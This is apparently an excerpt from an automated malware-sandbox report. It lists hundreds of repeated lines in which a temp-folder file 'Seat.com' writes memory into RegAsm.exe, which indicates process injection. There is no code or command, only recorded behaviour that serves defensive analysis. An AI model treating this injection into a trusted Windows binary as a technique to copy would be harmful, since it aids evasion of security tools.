                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24010
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24074
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A240D8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2413C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A241A0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24204
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24268
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A242CC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24330
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24394
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A243F8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2445C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A244C0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24524
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24588
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A245EC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24650
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A246B4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24718
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2477C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A247E0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24844
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A248A8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2490C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24970
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A249D4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24A38
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24A9C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24B00
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24B64
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24BC8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24C2C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24C90
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24CF4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24D58
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24DBC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24E20
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24E84
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24EE8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24F4C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A24FB0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25014
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25078
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A250DC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25140
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A251A4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25208
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2526C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A252D0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25334
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25398
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A253FC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25460
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A254C4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25528
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2558C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A255F0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25654
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A256B8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2571C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25780
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A257E4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25848
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A258AC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25910
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25974
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A259D8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25A3C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25AA0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25B04
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25B68
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25BCC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25C30
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25C94
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25CF8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25D5C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25DC0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25E24
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25E88
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25EEC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25F50
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A25FB4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26018
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2607C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A260E0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26144
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A261A8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2620C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26270
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A262D4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26338
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2639C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26400
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26464
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A264C8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2652C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26590
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A265F4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26658
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A266BC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26720
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26784
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A267E8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2684C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A268B0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26914
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26978
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A269DC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26A40
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26AA4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26B08
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26B6C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26BD0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26C34
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26C98
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26CFC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26D60
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26DC4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26E28
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26E8C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26EF0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26F54
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A26FB8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2701C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27080
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A270E4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27148
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A271AC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27210
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27274
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A272D8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2733C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A273A0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27404
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27468
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A274CC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27530
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27594
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A275F8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2765C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A276C0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27724
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27788
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A277EC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27850
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A278B4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27918
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2797C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A279E0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27A44
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27AA8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27B0C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27B70
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27BD4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27C38
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27C9C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27D00
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27D64
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27DC8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27E2C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27E90
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27EF4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27F58
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A27FBC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28020
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28084
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A280E8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2814C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A281B0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28214
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28278
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A282DC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28340
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A283A4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28408
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2846C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A284D0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28534
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28598
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A285FC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28660
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A286C4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28728
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2878C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A287F0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28854
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A288B8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2891C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28980
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A289E4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28A48
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28AAC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28B10
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28B74
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28BD8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28C3C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28CA0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28D04
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28D68
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28DCC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28E30
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28E94
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28EF8
